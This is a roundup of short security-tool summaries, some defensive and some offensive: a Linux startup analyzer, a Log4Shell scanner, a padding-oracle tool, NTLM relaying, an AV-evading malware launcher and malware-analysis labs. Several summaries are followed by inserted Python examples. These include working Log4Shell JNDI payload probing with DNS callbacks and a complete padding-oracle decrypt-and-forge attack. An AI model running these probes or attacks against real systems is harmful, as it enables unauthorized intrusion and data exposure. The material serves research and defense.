RCLocals : Linux Startup Analyzer
RCLocals is inspired by Autoruns from Sysinternals. It analyzes every Linux startup path to find backdoors, verifies process integrity, scans for processes with injected shared libraries ("DLL injection" in Linux terms) and more. Things covered: the GPG keys trusted by the system; installed packages; file integrity; process integrity (processes, and libraries loaded into a process, that do not belong to any installed package); processes with spoofed names (processes that use prctl() to...
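Two of the checks listed above, process integrity (mapped files that no installed package owns) and name spoofing via prctl(), can be reproduced with a few lines against /proc. The following is an added example, not RCLocals' own code: the /proc/&lt;pid&gt;/maps excerpt and the package-ownership table are constructed for illustration, and the live lookup assumes a Debian-style system with `dpkg -S` (an rpm-based host would use `rpm -qf` instead).

```python
import os
import subprocess

# Constructed /proc/<pid>/maps excerpt (not captured from a real host). The library under
# /tmp and the one mapped from an unlinked file are what an injected process tends to show.
SAMPLE_MAPS = """\
55d2c0a00000-55d2c0a20000 r-xp 00000000 08:01 1234   /usr/sbin/sshd
7f1a2b000000-7f1a2b1c0000 r-xp 00000000 08:01 5678   /usr/lib/x86_64-linux-gnu/libc.so.6
7f1a2b400000-7f1a2b410000 r-xp 00000000 08:01 9999   /tmp/.x/libhook.so
7f1a2b600000-7f1a2b610000 r-xp 00000000 08:01 4242   /dev/shm/payload.so (deleted)
7f1a2b800000-7f1a2b821000 rw-p 00000000 00:00 0      [heap]
7ffd1e000000-7ffd1e021000 rw-p 00000000 00:00 0      [stack]
"""

# Constructed stand-in for the package database: path -> owning package.
SAMPLE_OWNERS = {
    "/usr/sbin/sshd": "openssh-server",
    "/usr/lib/x86_64-linux-gnu/libc.so.6": "libc6",
}

DELETED = " (deleted)"   # suffix the kernel appends when the backing file was unlinked


def mapped_files(maps_text):
    """Distinct file paths backing a process's mappings; pseudo-mappings like [heap] are skipped.
    The '(deleted)' suffix is kept on purpose: a library mapped from an unlinked file is suspicious."""
    seen = []
    for line in maps_text.splitlines():
        fields = line.split(None, 5)      # the path is the 6th field and may contain spaces
        if len(fields) < 6 or fields[5].startswith("["):
            continue
        if fields[5] not in seen:
            seen.append(fields[5])
    return seen


def dpkg_owner(path):
    """Package owning path according to dpkg, or None if unowned or dpkg is absent.
    Both the path and its realpath are tried: dpkg -S does not follow symlinks, so on a
    merged-/usr system /lib/... versus /usr/lib/... would otherwise raise false alarms."""
    for candidate in {path, os.path.realpath(path)}:
        try:
            res = subprocess.run(["dpkg", "-S", candidate], capture_output=True, text=True, check=False)
        except FileNotFoundError:
            return None
        if res.returncode == 0:
            return res.stdout.split(": ", 1)[0].strip()
    return None


def unpackaged_mappings(maps_text, owner_lookup=dpkg_owner):
    """Mapped files that no installed package accounts for (the 'process integrity' check)."""
    findings = []
    for path in mapped_files(maps_text):
        if path.endswith(DELETED) or owner_lookup(path) is None:
            findings.append(path)
    return findings


COMM_LEN = 15   # TASK_COMM_LEN is 16 including the NUL, so /proc/<pid>/comm holds at most 15 chars


def name_spoofed(comm, exe_path):
    """True when the kernel-visible name (settable with prctl(PR_SET_NAME)) does not match the
    executable behind /proc/<pid>/exe. Comparing on the truncated prefix avoids flagging every
    legitimate daemon whose binary name is longer than 15 characters."""
    return comm.strip() != os.path.basename(exe_path)[:COMM_LEN]


def scan_pid(pid):
    """Live check of one process; needs permission to read /proc/<pid>/exe and maps."""
    base = "/proc/%d" % pid
    with open(base + "/comm") as f:
        comm = f.read()
    exe = os.readlink(base + "/exe")
    with open(base + "/maps") as f:
        maps_text = f.read()
    return {"spoofed_name": name_spoofed(comm, exe), "unpackaged": unpackaged_mappings(maps_text)}
```

Run `scan_pid(os.getpid())` to try it on the current interpreter; on a packaged Python the only findings should be site-packages installed outside the package manager.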
Log4J-Detect : Script To Detect The “Log4j” Java Library Vulnerability For A List Of URLs With Multithreading
Log4J-Detect is a Python 3 script, log4j-detect.py, that checks whether each URL in a given list is vulnerable to CVE-2021-44228. It sends a GET request to every URL, using threads for higher throughput. The request carries a payload that, on a vulnerable target, causes a DNS request to Burp Collaborator /...
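The mechanism described above (a JNDI lookup string in request headers, sent concurrently, with success observed out of band as a DNS query) is easy to show end to end. The block below is an added example, not the Log4J-Detect script itself: the header names, the `callback_domain` and the URLs are assumptions, and the `sender` parameter exists so the network step can be swapped for a stub. The point it adds to the paragraph is correlation: each URL gets its own token in the callback hostname, so a later DNS hit at the Collaborator server can be mapped back to the URL that triggered it.

```python
import secrets
import urllib.error
import urllib.request
from concurrent.futures import ThreadPoolExecutor

# Headers commonly logged by Java web stacks and therefore likely to reach Log4j (assumption).
INJECT_HEADERS = ("User-Agent", "X-Api-Version", "Referer", "X-Forwarded-For")


def make_payload(token, callback_domain):
    """JNDI lookup string; a vulnerable Log4j resolves <token>.<callback_domain> via DNS."""
    return "${jndi:ldap://%s.%s/a}" % (token, callback_domain)


def build_probe(url, callback_domain):
    """(token, headers) for one URL. The token is unique per URL so a DNS hit identifies the URL."""
    token = secrets.token_hex(6)          # 12 lowercase hex chars: a valid DNS label
    payload = make_payload(token, callback_domain)
    return token, {h: payload for h in INJECT_HEADERS}


def send_get(url, headers, timeout=10):
    """Default sender: plain GET with urllib. Returns the HTTP status, or None on transport error.
    A 4xx/5xx answer is still a valid probe: the header was usually logged before the error."""
    req = urllib.request.Request(url, headers=headers, method="GET")
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.status
    except urllib.error.HTTPError as e:
        return e.code
    except (urllib.error.URLError, OSError):
        return None


def probe_all(urls, callback_domain, sender=send_get, workers=10):
    """Send one probe per URL concurrently. Returns {token: url} for later correlation."""
    token_map = {}

    def one(url):
        token, headers = build_probe(url, callback_domain)
        token_map[token] = url
        sender(url, headers)

    with ThreadPoolExecutor(max_workers=workers) as pool:
        list(pool.map(one, urls))         # list() surfaces any exception raised in a worker
    return token_map


def correlate(token_map, observed_names):
    """Map DNS names seen at the callback server back to the URLs that triggered them.
    DNS is case-insensitive (resolvers may randomize case), so the label is lowercased."""
    vulnerable = {}
    for name in observed_names:
        token = name.split(".", 1)[0].lower()
        if token in token_map:
            vulnerable[token_map[token]] = name
    return vulnerable
```

Note that the script alone cannot decide vulnerability: it only records which token went to which URL. The verdict comes from the DNS names observed at the callback server, fed through `correlate` afterwards.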
Rustpad : Multi-Threaded Padding Oracle Attacks Against Any Service
Rustpad is a multi-threaded successor to the classic padbuster, written in Rust. It abuses a padding oracle vulnerability to decrypt any ciphertext, or to encrypt arbitrary plaintext, without knowing the encryption key. Features: decryption of ciphertexts; encryption of arbitrary plaintext; multi-threading at both block and byte level; a modern, real-time, interactive TUI; no-TTY support, so output can be piped to a file; support for web server oracles... and script-based oracles. For...
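Both capabilities named above, decrypting without the key and forging ciphertext for a chosen plaintext, follow from one primitive: recovering the block cipher's output for a single ciphertext block by asking the oracle about crafted preceding blocks. The block below is an added example, not Rustpad's code. It assumes CBC with PKCS#7 padding and a 16-byte block; a toy Feistel cipher built on SHA-256 stands in for AES so the example runs with the standard library only, and the attacker functions never touch the key. It also handles the edge case that trips up naive implementations: at the last byte, a pad of 0x02 0x02 (or longer) is accepted by the oracle just like 0x01.

```python
import hashlib
import os

BLOCK = 16


def xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))


# Toy 128-bit block cipher (4-round Feistel over SHA-256) standing in for AES (assumption).
# Only the CBC structure matters for the attack; the attacker code never calls these.
def _f(key, rnd, half):
    return hashlib.sha256(key + bytes([rnd]) + half).digest()[:8]


def block_encrypt(key, block):
    l, r = block[:8], block[8:]
    for rnd in range(4):
        l, r = r, xor(l, _f(key, rnd, r))
    return l + r


def block_decrypt(key, block):
    l, r = block[:8], block[8:]
    for rnd in reversed(range(4)):
        l, r = xor(r, _f(key, rnd, l)), l
    return l + r


def pad(data):
    n = BLOCK - len(data) % BLOCK
    return data + bytes([n]) * n


def unpad(data):
    n = data[-1]
    if not 1 <= n <= BLOCK or data[-n:] != bytes([n]) * n:
        raise ValueError("bad padding")   # the distinguishable error that makes the oracle
    return data[:-n]


def cbc_encrypt(key, plaintext):
    prev = os.urandom(BLOCK)              # IV travels as the first ciphertext block
    out, padded = [prev], pad(plaintext)
    for i in range(0, len(padded), BLOCK):
        prev = block_encrypt(key, xor(padded[i:i + BLOCK], prev))
        out.append(prev)
    return b"".join(out)


def cbc_decrypt(key, ciphertext):
    blocks = [ciphertext[i:i + BLOCK] for i in range(0, len(ciphertext), BLOCK)]
    return unpad(b"".join(xor(block_decrypt(key, c), p) for p, c in zip(blocks, blocks[1:])))


def make_oracle(key):
    """Server side: the only thing leaked is whether the padding was valid."""
    def oracle(ciphertext):
        try:
            cbc_decrypt(key, ciphertext)
            return True
        except ValueError:
            return False
    return oracle


# Attacker side: only the oracle, never the key.
def recover_intermediate(oracle, target):
    """Recover D_key(target) byte by byte from the end by crafting the preceding block."""
    inter = bytearray(BLOCK)
    for pos in range(BLOCK - 1, -1, -1):
        padv = BLOCK - pos
        prev = bytearray(BLOCK)
        for j in range(pos + 1, BLOCK):
            prev[j] = inter[j] ^ padv     # known bytes are forced to decrypt to the pad value
        for guess in range(256):
            prev[pos] = guess
            if not oracle(bytes(prev) + target):
                continue
            if pos == BLOCK - 1:
                # Edge case: a pad of 0x02 0x02 (or longer) also passes at the last byte.
                # Flipping the byte before it breaks such a pad but not a genuine 0x01.
                prev[pos - 1] ^= 0xFF
                still_ok = oracle(bytes(prev) + target)
                prev[pos - 1] ^= 0xFF
                if not still_ok:
                    continue
            inter[pos] = guess ^ padv
            break
        else:
            raise RuntimeError("no byte accepted at position %d: not a padding oracle?" % pos)
    return bytes(inter)


def padding_oracle_decrypt(oracle, ciphertext):
    blocks = [ciphertext[i:i + BLOCK] for i in range(0, len(ciphertext), BLOCK)]
    return unpad(b"".join(xor(recover_intermediate(oracle, c), p) for p, c in zip(blocks, blocks[1:])))


def padding_oracle_encrypt(oracle, plaintext):
    """Forge IV||C1..Cn that decrypts to plaintext: pick Cn freely, then walk backwards,
    setting each earlier block (finally the IV) to D(next block) XOR wanted plaintext block."""
    padded = pad(plaintext)
    out = [bytes(BLOCK)]
    for i in range(len(padded) - BLOCK, -1, -BLOCK):
        out.insert(0, xor(recover_intermediate(oracle, out[0]), padded[i:i + BLOCK]))
    return b"".join(out)


def demo():
    key = os.urandom(16)                  # secret; the attack functions above never see it
    oracle = make_oracle(key)
    secret = b"attack at dawn; padding oracles leak plaintext"
    recovered = padding_oracle_decrypt(oracle, cbc_encrypt(key, secret))
    forged = padding_oracle_encrypt(oracle, b"admin=true;user=eve")
    return recovered, cbc_decrypt(key, forged)
```

Each block costs at most 16 x 256 oracle queries, and blocks are independent of each other, which is exactly what Rustpad's block-level and byte-level threading parallelizes. The fix on the server side is the same regardless of tool: authenticate the ciphertext (an AEAD mode, or encrypt-then-MAC) so that a padding error is never distinguishable from any other failure.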
SyntheticSun : A Defense-In-Depth Security Automation And Monitoring Framework
SyntheticSun is a defense-in-depth security automation and monitoring framework that uses threat intelligence, machine learning, managed AWS security services and serverless technologies to continuously prevent, detect and respond to threats. "You sleep in fragmented glass / With reflections of you, / But are you feeling alive? / Yeah let me ask you, / Are you feeling alive?" Synopsis: uses event- and time-based serverless automation (e.g. AWS CodeBuild, AWS Lambda) to...
Msmailprobe : Office 365 And Exchange Enumeration
Msmailprobe: it is widely known that OWA (Outlook Web App) is vulnerable to time-based user enumeration. This tool leverages all known, and even some lesser-known, services exposed by default Exchange installations to enumerate users. It also targets Office 365 for error-based user enumeration. Getting started: to download and compile the simple, dependency-free code, you must first install Go (GoLang)!...
RPC Firewall : Stopping Lateral Movement via the RPC Firewall
RPC is the underlying mechanism behind numerous lateral movement techniques, reconnaissance, relay attacks, and plain exploitation of vulnerable RPC services. DCSync? Over RPC. Remote DCOM? Over RPC. WMIC? Over RPC. SharpHound? Over RPC. PetitPotam? Over RPC. PsExec? Over RPC. ZeroLogon? Over RPC... well, you get the idea :) What is the RPC Firewall used for? Research: install the RPC Firewall and configure it to audit all remote RPC...
Lsarelayx : NTLM Relaying For Windows Made Easy
Lsarelayx is a system-wide NTLM relay tool designed to relay incoming NTLM-based authentication to the host it is running on. It relays any incoming authentication request, including SMB. Since lsarelayx hooks into existing application authentication flows, it will also attempt to service the original authentication request after the relay is complete. This prevents the target application/protocol...
RiotPot : Resilient IoT And Operational Technology Honeypot
RiotPot is an interoperable, medium-interaction honeypot focused primarily on emulating IoT and OT protocols, although it can also emulate other services. These services are loaded into the honeypot as plugins, which makes RIoTPot modular and very portable. The services are loaded at runtime, meaning that the weight of the honeypot will vary...
Skrull : A Malware DRM, That Prevents Automatic Sample Submission By AV/EDR
Skrull is a malware DRM that prevents automatic sample submission by AV/EDR and signature scanning from the kernel. It generates launchers that run malware on the victim using the Process Ghosting technique. The launchers are also anti-copy: they break naturally once submitted. Video Demo / Download
PMAT-labs : Labs For Practical Malware Analysis And Triage
PMAT-labs: this repository contains live malware samples for use in the Practical Malware Analysis & Triage (PMAT) course. The samples are either written to emulate common malware characteristics or are live, real-world, "caught in the wild" samples. Both categories are dangerous. These samples must be handled with extreme caution at all times. Do not download these samples to...